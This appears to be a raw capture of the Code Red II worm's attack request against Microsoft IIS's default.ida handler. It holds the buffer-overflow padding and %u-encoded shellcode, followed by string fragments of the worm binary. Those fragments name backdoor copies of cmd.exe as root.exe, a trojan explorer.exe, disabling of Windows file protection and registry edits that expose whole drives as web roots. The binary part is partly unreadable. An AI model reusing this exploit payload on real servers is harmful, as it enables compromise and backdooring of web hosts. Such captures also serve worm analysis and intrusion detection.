GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0 Content-type: text/xml Content-length: 3379 CodeRedII F4)E Th~f Th~f ;MZu KERNu EL32u GetPu rocAu D$$dg LoadLibraryA CreateThread GetTickCount Sleep GetSystemDefaultLangID GetSystemDirectoryA CopyFileA GlobalFindAtomA GlobalAddAtomA CloseHandle _lcreat _lwrite _lclose GetSystemTime WS2_32.DLL socket closesocket ioctlsocket connect select send recv gethostname gethostbyname WSAGetLastError USER32.DLL ExitWindowsEx \CMD.EXE d:\inetpub\scripts\root.exe d:\progra~1\common~1\system\MSADC\root.exe hT @ hH @ hX @ t6Ff %`0@ %d0@ %h0@ %p0@ %t0@ %x0@ %|0@ \EXPLORER.EXE SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon SFCDisable SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots /Scripts /MSADC c:\,,217 d:\,,217 KERNEL32.dll ADVAPI32.dll Sleep GetWindowsDirectoryA WinExec RegQueryValueExA RegSetValueExA RegOpenKeyExA RegCloseKey d:\explorer.exe 8>u'j